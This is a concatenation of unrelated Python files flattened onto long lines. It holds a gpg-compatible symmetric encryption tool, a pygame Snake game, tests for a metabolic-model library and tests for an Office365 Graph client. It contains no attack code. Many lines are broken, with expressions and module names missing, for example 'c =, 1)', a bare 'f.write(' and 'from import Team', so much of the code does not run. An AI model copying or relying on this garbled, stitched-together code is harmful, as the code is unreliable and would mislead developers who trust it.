<filename>lib/tinygpgs/ """Encryption and decryption command-line tool with gpg(1) compatibility.""" import sys from tinygpgs.pyx import ensure_binary, integer_types, is_stdin_text, is_python_function, callable # Here we don't import anything from tinygpgs, to make --help and flag # parsing fast. We do lazy imports later as needed. # !! Convert README.txt to for easier viewing on GitHub. # !! Add --speed-test with dependency checks on Crypto.Cipher._AES. # !! Add --install-pycrypto, make it work as root and non-root, make it # download pip first if needed, make it remind the user about # `apt-get install python-dev' (not needed on macOS, needed on Linux; # maybe python3-dev), make it do `python -m pip install --user pycrypto', # or `sudo apt-get install pycrypto'. # !! Add --install-hashlib for Python 2.4. # !! Add section about installing pycrypto (even on macOS) to README.txt, # including --speed-test. # !! Add warning if slow because of Python hash or cipher. # !! Document encryptedfile and other Python modules. # !! Check proper error message in Python 2.3, 2.2, 2.1 and 2.0. # !! Add bzip2 compression and decompression using `import subprocess'. This helps with `sudo apt-get install python3.5-minimal'. # !! Add mdc_obj.update using a subprocess. # !! Verify and improve Win32 support (binary mode etc.). Add a .cmd file which runs `python tinygpgs.single ...'. # !! Make generic, independent of tinygpgs. # !! doc: py3 syntax conversion: print statement # !! doc: py3 syntax conversion: octal literals: 0123 is SyntaxError, but 0123e6 is OK. # !! doc: py3 conversion: ord(data[:1]) instead of ord(data[0]) # !! doc: py3 conversion: basic level: just display an error message on Python 3, octal still has to be converted # !! doc: py3 conversion: b'%d' % 42 doesn't work in Python 3.4. # !! doc: py3 conversion: how to detect Python 3: if type(zip()) is not list: # Python 3. # !! doc: py3 conversion: type(memoryview(b'x')[0]) == type(b'') is different in Python 3.2 (True) and 3.3 (False). # !! doc: py3 syntax conversion: no u'...' in Python 3.2, so no u'...' in tinygpgs. # !! doc: py3 warnings SUXX: if size is (): # SyntaxWarning: "is" with a literal. Did you mean "=="? # This line is read by VERSION = '0.18' # --- Passphrase prompt. def prompt_passphrase(is_twice): sys.stderr.flush() sys.stdout.flush() import getpass # Unfortunately in Python 2.4 and 2.5, this raises a termios.error if # stdin is redirected to a file. As a workaround, upgrade to Python >=2.6, # or use `--passphrase ...'. passphrase = getpass.getpass('Enter passphrase: ') if not passphrase: raise SystemExit('fatal: empty passphrase') if is_twice: passphrase2 = getpass.getpass('Re-enter passphrase: ') if passphrase != passphrase2: raise SystemExit('fatal: passphrases do not match') return passphrase # --- Platform-specific code. def set_fd_binary(fd): """Make sure that os.write(fd, ...) doesn't write extra \r bytes etc.""" import sys if sys.platform.startswith('win'): import os import msvcrt msvcrt.setmode(fd, os.O_BINARY) # --- Command-line parsing and main(). FLAG_DOC = r""" Encryption and decryption flags: * --pinentry-mode <value>: Value must be loopback. Otherwise ignored for PGP 2.x compatibility. * --slow-cipher: Use the slow, pure Python implementation of the ciphers. * --no-slow-cipher: Use the fast, C extension implementation (PyCrypto) of the ciphers, if available. Otherwise, use the slow, pure Python implementation. * --slow-hash: Use the slow, pure Python implementation of the hashes. * --no-slow-hash: Use the fast, C extension implementation (PyCrypto) of the hashes, if available. Otherwise, use the slow, pure Python implementation. * --file-class: Use the GpgSymmetricFile* class API to do the work. It's a bit slower than the function-based API, so it's not recommended for regular use. * --file-class-big: Use the GpgSymmetricFile* class API with a single call to .read() and .write(...) to do the work. This is not recommended for general use, because it may use a lot of memory. * --no-file-class: Use the function API to do the work. * --batch: Don't ask the user. Fail if no passphrase given on the command line. * --no-batch: Ask the user if needed. Typically the passphrase is asked. * --yes: Auto-answer yes to questions. Will overwrite existing output files. * --no: Don't answer yes to questions. Will abort if the output file already exists, and will keep it intact. * --quiet (-q, --no-show-info): Don't show file parameters on stderr. * --verbose (-v, --show-info): Show file parameters on stderr. * --show-session-key: Show the session key (block cipher key) on stderr. Insecure, should be used for debugging or during coercion only. * --no-show-session-key: Don't show the session key on stderr. Default. * --passphrase <pass>: Use the specified passphrase. This flag is insecure (because it adds the passphrase to your shell history), please don't specify it, but type the passphrases interactively or use --passphrase-file ... or --passphrase-fd ... instead. * --passphrase-file <file>: Read the first line of <file> and use it (without the trailing line breaks) as passphrase. * --passphrase-fd <fd>: Read the first line from file descriptor <fd> (e.g. 0 for stdin), and use it (without the trailing line breaks) as passphrase. Be careful: if stdin is used and it's a TTY, it will echo the passphrase. * --passphrase-repeat <n>: If <n> is more than 1, ask the passphrase twice before encryption. Doesn't affect decryption. The default is same as for gpg(1): 1 if `--pinentry-mode loopback' is specified, otherwise 2. * --bufcap <n>: Use buffer size of (approximately) <n> throughout, and also use it as GP partial packet size. <n> must be a power of 2 at least 512. The default is 8192. * --output (-o) <file>: Write the output to <file> instead of stdout. * --no-options: Ignored for gpg(1) compatibility. * --no-keyring: Ignored for gpg(1) compatibility. * --no-default-keyring: Ignored for gpg(1) compatibility. * --no-usage-agent: Ignored for gpg(1) 1.x compatibility. * --no-symkey-cache: Ignored for gpg(1) 2 compatibility. * --no-auto-check-trustdb: Ignored for gpg(1) 2 compatibility. Encryption-only flags: * --cipher-algo <algo>: Use the specified encryption algorithm. Values: idea, 3des (des3), cast5, blowfish, aes-128, aes-192, aes-256, twofish-256, des, twofish-128. * --digest-algo <algo>: Use the specified hash for string-to-key. Values: md5, sha1, ripemd160, sha256, sha384, sha512, sha224. * --compress-algo <algo>: Use the specified compression algorithm. Values: none (uncompressed), zlib, zlib, bzip2. * --compress-level <n>: 0: disable compression, 1: fastest, low effort compression, ..., 6: default compression effort, ..., 9: slowest compression. * --bzip2-compress-level <n>: Like --compress-level ..., but applies only if --compress-algo bzip2 is active. * -a (--armor): Wrap output in ASCII armor (header and Base64 encoding). * --no-armor: Don't wrap output in ASCII armor. * --s2k-mode <n>. Use the specified string-to-key mode. Values: 0: simple, 1: 1: salted, 3: iterated-salted. * --s2k-count <n>: Run the hash over approximately <n> bytes for --s2k-mode 3. * --force-mdc: Enable appending of modification-detection code (MDC, hash, message digest). Default. * --disable-mdc: Omit the modification-detection code from the output. * --plain-filename <file>: Store the specified filename in the output. * --literal-type <c>: Store the specified file type in the output. The value b indicates binary, other values are not recommended. No matter this flag value, all files are treated as binary. * --mtime <mtime>: Store the specified last modification time in the output. The value is an integer, the Unix timestamp. The default is 0. * -f (--recipient-file) <keyfile>: Do public key encryption to to specified recipient (<keyfile> generated by `gpg --export'). Use `-e' instead of `-c' if you don't want to enter a passphrase as well. Decryption-only flags: * --override-session-key: <cipher-algo-int>:<session-key-hex>: Ignore the session key in the file, use the specified value instead. Useful for revealing the plaintext withouth revealing the passphrase. """ LICENSE = ( 'This is free software, MIT license. ' 'There is NO WARRANTY. Use at your risk.\n') def show_usage(argv0, do_flags=False): flag_doc = FLAG_DOC * bool(do_flags) if flag_doc.startswith('\n '): flag_doc = flag_doc.replace('\n ', '\n') sys.stderr.write( 'tinygpgs %s: symmetric key encryption tool compatible with GPG\n%s' 'encryption usage: %s -c [<flag> ...] [FILE.bin]\n' 'decryption usage: %s -d [<flag> ...] FILE.bin.gpg >FILE.bin\n' '\n%s' % (VERSION, LICENSE, argv0, argv0, flag_doc)) def get_flag_arg(argv, i): if i >= len(argv): raise SystemExit('usage: missing argument for flag: ' + argv[i - 1]) return argv[i] def get_flag_arg_int(argv, i): value = get_flag_arg(argv, i) try: return int(value) except ValueError: # TODO(pts): Check for positive value etc. raise SystemExit('usage: flag value must be an integer: %s %s' % (argv[i - 1], argv[i])) def read_passphrase_from_fd(fd): # We need binary mode for 8-bit accurate s2k. set_fd_binary(fd) import os # Don't read more bytes than needed. output = [] while 1: c =, 1) # Don't read too much. if not c or c in b'\r\n': # No need for os.close(fd). return b''.join(output) output.append(c) def show_info(msg): sys.stderr.write('info: %s\n' % (msg,)) sys.stderr.flush() # Automatic, but play it safe. def show_version(): from tinygpgs import cipher from tinygpgs import hash compressions = ['Uncompressed'] try: import zlib compressions.extend(('ZIP', 'ZLIB')) except ImportError: pass try: import bz2 compressions.append('BZIP2') except ImportError: pass cipher_map = {'DES3': '3DES', 'CAST': 'CAST5'} ciphers = sorted(cipher_map.get(c, c) for c in (n.upper() for n in dir(cipher) if callable(getattr(cipher, n)) and callable(getattr(getattr(cipher, n), 'encrypt', None)))) from tinygpgs import gpgs ciphers2 = [] for c in ciphers: cipher_cons, _, keytable_size = gpgs.get_cipher_cons(c + '-128' * (c in ('AES', 'TWOFISH')), False, False) ciphers2.append(''.join((c, ' (slow)' * is_python_function(cipher_cons(b'\0' * keytable_size).encrypt)))) hashes = sorted(n[5:].upper() for n in dir(hash) if n.startswith('Slow_') and callable(getattr(hash, n)) and callable(getattr(getattr(hash, n), 'update', None))) hashes2 = [] for n in hashes: mdc_obj = gpgs.new_hash(n) hashes2.append(''.join((n, ' (slow)' * is_python_function(gpgs.new_hash(n).update)))) # Format similar to GPG 2.1. sys.stdout.write('tinygpgs %s\n%s\nSupported algorithms:\nCipher: %s\nHash: %s\nCompression: %s\n' % (VERSION, LICENSE, ', '.join(ciphers2), ', '.join(hashes2), ', '.join(compressions))) def main(argv, zip_file=None): if len(argv) < 2: show_usage(argv[0]) sys.exit(1) argv = list(argv) is_batch = is_yes_flag = False do_passphrase_twice = True file_class_mode = 0 output_file = input_file = None bufcap = 8192 params = {} params['passphrase'] = () params['show_info_func'] = show_info encrypt_params = {} encrypt_params['recipients'] = [] decrypt_params = {} flags_with_arg = ( '--pinentry-mode', '--passphrase', '--passphrase-fd', '--passphrase-file', '--passphrase-repeat', '--bufcap', '--output', '--cipher-algo', '--digest-algo', '--s2k-digest-algo', '--compress-algo', '--compress-level', '--bzip2-compress-level', '--s2k-mode', '--s2k-count', '--plain-filename', '--literal-type', '--mtime', '--recipient-file', '--keyring', '--secret-keyring', '--trust-model') public_key_flags = ( '-e', '--encrypt', '-s', '--sign', '--verify', '--generate-key', '--gen-key', '--full-generate-key', '--full-gen-key', '--edit-key', '--export', '--import', '--fast-import', '--change-passphrase', '--passwd', '--sign-key', '--lsign-key', '--quick-sign-key', '--quick-lsign-key', '--trusted-key', '--trust-model', '--recipient', '-r', '--hidden-recipient', '-R', '--hidden-recipient-file', '-F', '--encrypt-to', '--hidden-encrypt-to', '--no-encrypt-to', '--sender', '--primary-keyring', ) # gpg(1). i, do_encrypt = 1, None while i < len(argv): # Scan for -c or -d. arg = argv[i] if arg == '-' or not arg.startswith('-'): break i += 1 if arg == '--': break if arg in ('-c', '--symmetric'): # Like gpg(1). do_encrypt = True elif arg in ('-e', '--encrypt'): do_encrypt = 2 elif arg in ('-d', '--decrypt'): # Like gpg(1). do_encrypt = False elif arg == '--help': show_usage(argv[0], do_flags=True) sys.exit(0) elif arg == '--version': show_version() sys.exit(0) elif arg in public_key_flags: raise SystemExit('usage: public-key cryptography not supported: %s' % arg) elif arg in flags_with_arg and i < len(argv): i += 1 if do_encrypt is None: show_usage(argv[0]) sys.exit(1) i = 1 while i < len(argv): arg = argv[i] if arg == '-' or not arg.startswith('-'): break i += 1 is_yes = not arg.startswith('--no-') if arg == '--': break elif arg in ('-c', '--symmetric', '-d', '--decrypt', '-e', '--encrypt'): # gpg(1). pass # Already parsed in the loop above. elif arg in ('--no-options', '--no-keyring', '--no-default-keyring', '--no-use-agent', '--no-symkey-cache', '--no-auto-check-trustdb'): # gpg(1). pass elif arg == '--use-agent': raise SystemExit('usage: unsupported flag: %s' % arg) elif arg == '--options': options_filename = get_flag_arg(argv, i) i += 1 raise SystemExit('usage: unsupported flag: %s' % arg) elif arg in ('--keyring', '--secret-keyring'): if get_flag_arg(argv, i) != '/dev/null': raise SystemExit('usage: unsupported flag value, expecting /dev/null: %s %s' % (arg, argv[i])) i += 1 elif arg == '--pinentry-mode': # gpg(1). if get_flag_arg(argv, i) != 'loopback': raise SystemExit('usage: unsupported flag value, expecting loopback: %s %s' % (arg, argv[i])) i += 1 do_passphrase_twice = False # Compatible with gpg(1). elif arg == '--trust-model': # gpg(1). get_flag_arg(argv, i) # Typical value: always i += 1 elif arg in ('--slow-cipher', '--no-slow-cipher'): params['is_slow_cipher'] = is_yes elif arg in ('--slow-hash', '--no-slow-hash'): params['is_slow_hash'] = is_yes elif arg in ('--file-class', '--no-file-class'): file_class_mode = int(is_yes) elif arg == '--file-class-big': file_class_mode = 2 elif arg in ('--batch', '--no-batch'): # gpg(1). is_batch = is_yes elif arg == '--yes': # gpg(1). is_yes_flag = True elif arg == '--no': # gpg(1). is_yes_flag = False elif arg in ('-q', '--quiet'): # gpg(1). params['show_info_func'] = False elif arg in ('-v', '--verbose'): # gpg(1). params['show_info_func'] = show_info elif arg in ('--show-info', '--no-show-info'): params['show_info_func'] = is_yes and show_info elif arg in ('--show-session-key', '--no-show-session-key'): # gpg(1). params['do_show_session_key'] = is_yes elif arg == '--passphrase': # gpg(1). params['passphrase'] = get_flag_arg(argv, i) i += 1 elif arg == '--passphrase-fd': # gpg(1). params['passphrase'] = get_flag_arg_int(argv, i) i += 1 elif arg == '--passphrase-file': # gpg(1). params['passphrase'] = [get_flag_arg(argv, i)] i += 1 elif arg == '--passphrase-repeat': # gpg(1). # GPG 2.1.18 ignores this flag with `--pinentry-mode loopback'. We use # it for a repeated passphrase prompt. do_passphrase_twice = get_flag_arg_int(argv, i) > 1 i += 1 elif arg == '--bufcap': bufcap = get_flag_arg_int(argv, i) i += 1 elif arg in ('-o', '--output'): # gpg(1). output_file = get_flag_arg(argv, i) i += 1 elif not do_encrypt and arg == '--override-session-key': # gpg(1). flag_value = get_flag_arg(argv, i) from tinygpgs import gpgs try: decrypt_params['override_session_key'] = gpgs.parse_override_session_key(flag_value) except ValueError as e: raise SystemExit('usage: invalid flag syntax (%s): %s %s' % (e, arg, argv[i])) i += 1 elif do_encrypt and arg == '--cipher-algo': # gpg(1). encrypt_params['cipher'] = get_flag_arg(argv, i) i += 1 elif do_encrypt and arg in ('--digest-algo', '--s2k-digest-algo'): # gpg(1). encrypt_params['s2k_digest'] = get_flag_arg(argv, i) i += 1 elif do_encrypt and arg == '--compress-algo': # gpg(10> encrypt_params['compress'] = get_flag_arg(argv, i) i += 1 elif do_encrypt and arg in ('-a', '--armor', '--no-armor'): # gpg(1). encrypt_params['do_add_ascii_armor'] = is_yes elif do_encrypt and arg in ('-z', '--compress-level'): # gpg(1). encrypt_params['compress_level'] = get_flag_arg_int(argv, i) i += 1 elif do_encrypt and arg == '--bzip2-compress-level': # gpg(1). encrypt_params['bzip2_compress_level'] = get_flag_arg_int(argv, i) i += 1 elif do_encrypt and arg == '--s2k-mode': # gpg(1). encrypt_params['s2k_mode'] = get_flag_arg_int(argv, i) i += 1 elif do_encrypt and arg == '--s2k-count': # gpg(1). encrypt_params['s2k_count'] = get_flag_arg_int(argv, i) i += 1 elif do_encrypt and arg == '--force-mdc': # gpg(1). encrypt_params['do_mdc'] = True elif do_encrypt and arg == '--disable-mdc': # gpg(1). encrypt_params['do_mdc'] = False elif do_encrypt and arg == '--plain-filename': encrypt_params['plain_filename'] = get_flag_arg(argv, i) i += 1 elif do_encrypt and arg == '--literal-type': encrypt_params['literal_type'] = get_flag_arg(argv, i) i += 1 elif do_encrypt and arg == '--mtime': encrypt_params['mtime'] = get_flag_arg_int(argv, i) i += 1 elif do_encrypt and arg in ('--recipient-file', '-f'): # gpg(1) 2. from tinygpgs import pubkey filename = get_flag_arg(argv, i) i += 1 f = open(filename, 'rb') try: encrypt_params['recipients'].append(pubkey.load_pk_encryption_key(, params.get('is_slow_cipher', False))) finally: f.close() else: raise SystemExit('usage: unknown flag: ' + arg) if i < len(argv) and input_file is None: # gpg(1). input_file = argv[i] i += 1 if i != len(argv): raise SystemExit('usage: too many command-line arguments') if do_encrypt == 2: if not encrypt_params['recipients']: raise SystemExit('usage: public-key encryption needs recipients; pass e.g. -f') if params['passphrase'] is (): params['passphrase'] = None # Don't ask for passphrase. if input_file is None: input_file = '-' if output_file is None: if do_encrypt and input_file != '-': # gpg(1). if encrypt_params.get('do_add_ascii_armor'): output_file = input_file + '.asc' else: output_file = input_file + '.gpg' else: output_file = '-' if bufcap < 1 or bufcap & (bufcap - 1): raise SystemExit('usage: --bufcap value must be a power of 2, got: %d' % bufcap) buflog2cap = 1 while bufcap > (1 << buflog2cap): buflog2cap += 1 assert bufcap == 1 << buflog2cap # Just to make sure. if buflog2cap > 30: raise SystemExit('usage: --bufcap value too large, must be at most %d, got: %d' % (1 << 30, bufcap)) if buflog2cap < 9: # Some ciphers need >= 16, GPG partial packets need at least 512. raise SystemExit('usage: --bufcap value too small, must be at least %d, got: %d' % (1 << 9, bufcap)) if isinstance(params['passphrase'], list): # File: # We need binary mode for 8-bit accurate s2k. try: f = open(params['passphrase'][0], 'rb') except IOError as e: raise SystemExit('fatal: error opening the passphrase file: %s' % e) try: params['passphrase'] = f.readline().rstrip(b'\r\n') finally: f.close() elif isinstance(params['passphrase'], integer_types): # File descroptor. params['passphrase'] = read_passphrase_from_fd(params['passphrase']) elif params['passphrase'] is (): # Interactive prompt. if is_batch: raise SystemExit('usage: passphrase prompt conflicts with --batch mode') params['passphrase'] = lambda is_twice=do_encrypt and do_passphrase_twice: ( prompt_passphrase(is_twice)) if is_stdin_text: import os inf, of = os.fdopen(0, 'rb'), os.fdopen(1, 'wb') else: inf, of = sys.stdin, sys.stdout try: if input_file == '-': set_fd_binary(inf.fileno()) else: inf = open(input_file, 'rb') if output_file == '-': set_fd_binary(of.fileno()) else: if not is_yes_flag: import os.path # TODO(pts): Like gpg(1), don't clobber the output on a decrypt # attempt with a bad passphrase or on a user abort during the # passphrase prompt. if os.path.exists(output_file): # gpg(1) asks the user interactively after the passphrase prompt. raise SystemExit('fatal: output file exists, not overwriting: %s' % output_file) of = open(output_file, 'wb') if do_encrypt: encrypt_params.update(params) # Shouldn't have common fields. encrypt_params['buflog2cap'] = buflog2cap if ('bzip2_compress_level' in encrypt_params and encrypt_params.get('compress', '').lower() == 'bzip2'): encrypt_params['compress_level'] = encrypt_params.pop('bzip2_compress_level') else: encrypt_params.pop('bzip2_compress_level', None) # Defaults in GPG <2.1, including 1.4.18. #encrypt_params.setdefault('cipher', 'sha256') #encrypt_params.setdefault('compress', 'none') #encrypt_params.setdefault('compress_level', 9) #encrypt_params.setdefault('do_mdc', False) from tinygpgs import gpgs if file_class_mode: from tinygpgs import file # Lazy import to make startup (flag parsing) fast. f = file.GpgSymmetricFileWriter(of.write, 'wb', **encrypt_params) try: if file_class_mode == 2: f.write( else: assert bufcap == f.bufcap data = while data: f.write(data) data = finally: f.close() else: gpgs.encrypt_symmetric_gpg(, of, **encrypt_params) else: # Decrypt. decrypt_params.update(params) # Shouldn't have common fields. from tinygpgs import gpgs try: if file_class_mode: from tinygpgs import file f = file.GpgSymmetricFileReader(, 'rb', **decrypt_params) try: if file_class_mode == 2: of.write( else: while 1: data = if not data: break of.write(data) finally: f.close() dparams = f.params else: dparams = gpgs.decrypt_symmetric_gpg(, of, **decrypt_params) except gpgs.BadPassphraseError as e: msg = str(e) sys.stderr.write('fatal: %s%s\n' % (msg[0].lower(), msg[1:].rstrip('.'))) sys.exit(2) if not dparams['has_mdc']: # Same as gpg(1)'s output after the colon. sys.stderr.write('warning: message was not integrity protected\n') finally: try: if of is not sys.stdout: of.close() finally: if inf is not sys.stdin: inf.close()
from math import floor import pygame from pygame.locals import * import time from bait import Bait from snake import Snake game_height = 611 game_width = 914 BLOCK_SIZE = 23 TILE_COLOR = (195, 207, 161) BG_COLOR = (64, 64, 64) class Game: def __init__(self): pygame.init() pygame.display.set_caption("Classic Snake Game") self.surface = pygame.display.set_mode((game_width, game_height)) self.pause_tile = pygame.image.load("resources\pause.png") self.lost_img = pygame.image.load("resources\game_lost.png") self.pause_sound = pygame.mixer.Sound("resources\sound_03.mp3") self.lost_sound = pygame.mixer.Sound("resources\sound_04.mp3") self.bg_img = pygame.image.load("resources\game_bg.png") self.numbers = [pygame.image.load("resources\z_0.png"), pygame.image.load("resources\z_1.png"), pygame.image.load("resources\z_2.png"), pygame.image.load("resources\z_3.png"), pygame.image.load("resources\z_4.png"), pygame.image.load("resources\z_5.png"), pygame.image.load("resources\z_6.png"), pygame.image.load("resources\z_7.png"), pygame.image.load("resources\z_8.png"), pygame.image.load("resources\z_9.png")] self.numbers_red = [pygame.image.load("resources\zz_0.png"), pygame.image.load("resources\zz_1.png"), pygame.image.load("resources\zz_2.png"), pygame.image.load("resources\zz_3.png"), pygame.image.load("resources\zz_4.png"), pygame.image.load("resources\zz_5.png"), pygame.image.load("resources\zz_6.png"), pygame.image.load("resources\zz_7.png"), pygame.image.load("resources\zz_8.png"), pygame.image.load("resources\zz_9.png")] # build places self.tiles = [[(0, 0) for x in range(18)] for y in range(32)] for i in range(18): for j in range(32): x = 90 + (j * 20) + (3 * j) y = 122 + (i * 20) + (3 * i) self.tiles[j][i] = (x, y) self.reset_game() # classes and variables self.snake = Snake(self, self.surface, 5) self.snake.draw() self.bait_1 = Bait(self, self.surface, 'bait_1') self.bait_2 = Bait(self, self.surface, 'bait_2') self.is_running = True self.game_status = '' self.score = 0 self.level = 1 self.speed = 0.3 def reset_game(self): # build surface - draw background self.draw_background(self.surface) self.reset_board() # update display pygame.display.flip() self.snake = Snake(self, self.surface, 5) self.snake.draw() self.bait_1 = Bait(self, self.surface, 'bait_1') self.bait_2 = Bait(self, self.surface, 'bait_2') self.is_running = True self.game_status = '' self.score = 0 self.level = 1 self.speed = 0.3 def locate_xy(self, part): xy = self.tiles[part[1]][part[0]] return xy def run(self): running = True pause = False while running: for event in pygame.event.get(): if event.type == KEYDOWN: if event.key == K_ESCAPE: running = False if event.key == K_RETURN: if self.game_status != 'lost': pause = not pause else: self.reset_game() pause = False if not pause and event.key == K_LEFT: self.snake.move('left') if not pause and event.key == K_RIGHT: self.snake.move('right') if not pause and event.key == K_UP: self.snake.move('up') if not pause and event.key == K_DOWN: self.snake.move('down') elif event.type == QUIT: running = False try: if not pause: self.update_score_level() time.sleep(self.speed - self.level * 0.00253) elif pause: if self.game_status == '': self.surface.blit(self.pause_tile, (834, 12)) pygame.display.flip() time.sleep(1) pygame.draw.rect(self.surface, BG_COLOR, pygame.Rect(832, 10, 50, 50)) pygame.display.flip() time.sleep(1) except Exception as e: self.game_status = 'lost' rect = self.lost_img.get_rect() self.surface.blit(self.lost_img, (game_width / 2 - rect.width / 2, game_height / 2 - rect.height / 2)) pygame.display.flip() pause = True def play(self): self.snake.walk() # draw elements snake_body = [] for i in self.snake.body: snake_body.append(i) self.bait_1.draw(0.1, snake_body) snake_body.append(self.bait_1.position) self.bait_2.draw(0.2, snake_body) # check snake collision if self.snake.body_hit(): raise "Collision Occurred" # check bait hit 1 if self.snake.bait_hit(self.bait_1.position): print("snake ate {0} - from bait_1".format(self.bait_1.bait_type)) self.bait_1.redefine() self.bait_1.clear() self.snake.increase_length(self.bait_1) self.score += self.bait_1.score # check bait hit 2 if self.snake.bait_hit(self.bait_2.position): self.bait_2.redefine() self.bait_2.clear() print("snake ate {0} - from bait_2".format(self.bait_2.bait_type)) self.snake.increase_length(self.bait_2) self.score += self.bait_2.score def update_score_level(self): is_red = False # calculate level self.level = int(self.score / 10) if self.level > 99: self.level = 99 is_red = True # fix background pygame.draw.rect(self.surface, BG_COLOR, pygame.Rect(266, 18, 120, 50)) pygame.draw.rect(self.surface, BG_COLOR, pygame.Rect(570, 18, 120, 50)) self.surface.blit(self.bg_img, (250, 20), (230, 0, 500, 51)) # calculate numbers hu = floor(self.score / 100) te = floor(self.score / 10) - hu * 10 on = self.score - hu * 100 - te * 10 if self.score < 999: score_hundred = self.numbers[hu] score_ten = self.numbers[te] score_one = self.numbers[on] else: score_hundred = self.numbers_red[9] score_ten = self.numbers_red[9] score_one = self.numbers_red[9] lte = floor(self.level / 10) lon = self.level - lte * 10 if not is_red: level_ten = self.numbers[lte] level_one = self.numbers[lon] else: level_ten = self.numbers_red[lte] level_one = self.numbers_red[lon] # blit numbers on screen self.surface.blit(score_hundred, (266, 18)) self.surface.blit(score_ten, (266 + 36, 18)) self.surface.blit(score_one, (266 + 36 + 36, 18)) self.surface.blit(level_ten, (586, 18)) self.surface.blit(level_one, (586 + 36, 18)) pygame.display.flip() def draw_background(self, surface): surface.fill(BG_COLOR) surface.blit(self.bg_img, (20, 20)) def reset_board(self): for j in range(len(self.tiles)): for i in range(len(self.tiles[j])): xy = self.tiles[j][i] pygame.draw.rect(self.surface, TILE_COLOR, pygame.Rect(xy[0], xy[1], 20, 20))
<reponame>zakandrewking/theseus<gh_stars>0 from theseus.models import * import cobra import os import pytest def test_get_model_list(): model_list = get_model_list() assert 'iJO1366' in model_list assert 'iAF1260' in model_list assert 'E coli core' in model_list def test_check_for_model(): assert check_for_model('e_coli_core')=='E coli core' assert check_for_model('E. coli core')=='E coli core' def test_load_model(): model = load_model('iJO1366') assert isinstance(model, cobra.core.Model) model = load_model('RECON1') assert isinstance(model, cobra.core.Model) def test_load_model_json(): model = load_model('iML1503') assert isinstance(model, cobra.core.Model) def test_id_for_new_id_style(): assert(id_for_new_id_style('EX_glc(r)', is_metabolite=False)=='EX_glc_r') assert(id_for_new_id_style('glucose[r]', is_metabolite=True)=='glucose_r') def test_convert_ids(): for model_name in 'iJO1366', 'iAF1260', 'E coli core': print "\n" print model_name model = load_model(model_name) # cobrapy style model = convert_ids(model, new_id_style='cobrapy') print 'cobrapy ids' print [str(x) for x in model.reactions if 'lac' in str(x)] assert 'EX_lac__D_e' in [str(x) for x in model.reactions] assert ['-' not in str(x) for x in model.reactions] print [str(x) for x in model.metabolites if 'lac' in str(x)] assert 'lac__D_e' in [str(x) for x in model.metabolites] assert ['-' not in str(x) for x in model.metabolites] # simpheny style model = convert_ids(model, new_id_style='simpheny') print 'simpheny ids' print [str(x) for x in model.reactions if 'lac' in str(x)] assert 'EX_lac-D(e)' in [str(x) for x in model.reactions] assert ['__' not in str(x) for x in model.reactions] print [str(x) for x in model.metabolites if 'lac' in str(x)] assert 'lac-D[e]' in [str(x) for x in model.metabolites] assert ['__' not in str(x) for x in model.metabolites] def test_get_formulas_from_names(): model = load_model('iAF1260') assert model.metabolites.get_by_id('acald_c').formula.elements['C'] == 2 assert model.metabolites.get_by_id('acald_c').formula.elements['H'] == 4 assert model.metabolites.get_by_id('acald_c').formula.elements['O'] == 1 def test_turn_off_carbon_sources(): for model_name in 'iJO1366', 'iAF1260', 'E coli core': print model_name model = load_model(model_name) model.reactions.get_by_id('EX_glc_e').lower_bound = -100 model.reactions.get_by_id('EX_ac_e').lower_bound = -100 model = turn_off_carbon_sources(model) assert model.reactions.get_by_id('EX_glc_e').lower_bound==0 assert model.reactions.get_by_id('EX_ac_e').lower_bound==0 def test_setup_model(): model = load_model('iJO1366') model = setup_model(model, 'EX_glc_e', aerobic=False, sur=18) assert model.reactions.get_by_id('EX_glc_e').lower_bound==-18 assert model.reactions.get_by_id('EX_o2_e').lower_bound==0 assert model.reactions.get_by_id('CAT').upper_bound==0 assert model.reactions.get_by_id('SPODM').upper_bound==0 model = setup_model(model, ['EX_glc_e', 'EX_xyl__D_e'], sur=-18) assert model.reactions.get_by_id('EX_glc_e').lower_bound==-18 assert model.reactions.get_by_id('EX_xyl__D_e').lower_bound==-18 model = setup_model(model, {'EX_glc_e':-5, 'EX_xyl__D_e':5}, sur=999) assert model.reactions.get_by_id('EX_glc_e').lower_bound==-5 assert model.reactions.get_by_id('EX_xyl__D_e').lower_bound==-5 def test_turn_on_subsystem(): with pytest.raises(NotImplementedError): turn_on_subsystem(None, None) def test_carbons_for_exchange_reaction(): model = load_model('iJO1366') assert carbons_for_exchange_reaction(model.reactions.get_by_id('EX_glc_e'))==6 assert carbons_for_exchange_reaction(model.reactions.get_by_id('EX_ac_e'))==2 assert carbons_for_exchange_reaction(model.reactions.get_by_id('EX_for_e'))==1 def test_add_pathway(): new = [ { '1poh_c': {'formula': 'C3H8O', 'name': '1-propanol'} }, { '2OBUTDC': {'2obut_c': -1, 'h_c': -1, 'ppal_c': 1, 'co2_c': 1}, '1PDH': {'ppal_c': -1, 'nadh_c': -1, 'h_c': -1, '1poh_c': 1, 'nad_c': 1}, 'EX_1poh_e': {'1poh_c': -1} }, { 'EX_1poh_e': '1-propanol production' }, { 'EX_1poh_e': (0, 1000) } ] m = load_model('iJO1366') model = add_pathway(m.copy(), *new, check_mass_balance=True) assert isinstance(model.metabolites.get_by_id(new[0].keys()[0]), cobra.Metabolite) reaction = model.reactions.get_by_id('EX_1poh_e') assert isinstance(model.reactions.get_by_id(new[1].keys()[0]), cobra.Reaction) assert reaction.reversibility == False assert reaction.upper_bound == 1000 assert reaction.lower_bound == 0 # test metabolite name assert model.metabolites.get_by_id('1poh_c').name == '1-propanol' # test mass balance assert len(model.reactions.get_by_id('1PDH').check_mass_balance()) == 0 # test ignore repeats model = add_pathway(m.copy(), *new) with pytest.raises(Exception): model = add_pathway(model, *new) model = add_pathway(model, *new, ignore_repeats=True)
<reponame>rikeshtailor/Office365-REST-Python-Client import uuid from import Team from tests.graph_case import GraphTestCase class TestGraphTeam(GraphTestCase): """Tests for teams""" target_team = None # type: Team @classmethod def setUpClass(cls): super(TestGraphTeam, cls).setUpClass() def test1_create_team_from_group(self): grp_name = "Group_" + uuid.uuid4().hex result = self.client.teams.create(grp_name).execute_query_retry(max_retry=6, timeout_secs=5) self.assertIsNotNone( self.__class__.target_team = result.value def test3_get_all_teams(self): teams = self.client.teams.get_all().execute_query() self.assertGreater(len(teams), 0) def test4_get_joined_teams(self): my_teams = self.assertIsNotNone(my_teams.resource_path) self.assertGreater(len(my_teams), 0) def test5_get_team(self): group_id = existing_team = self.client.teams[group_id].get().execute_query() self.assertIsNotNone(existing_team.resource_url) self.assertIsNotNone(existing_team.messaging_settings) if existing_team.is_archived: existing_team.unarchive() self.client.load(existing_team) self.client.execute_query() self.assertFalse(existing_team.is_archived) def test6_update_team(self): team_id = team_to_update = self.client.teams[team_id] 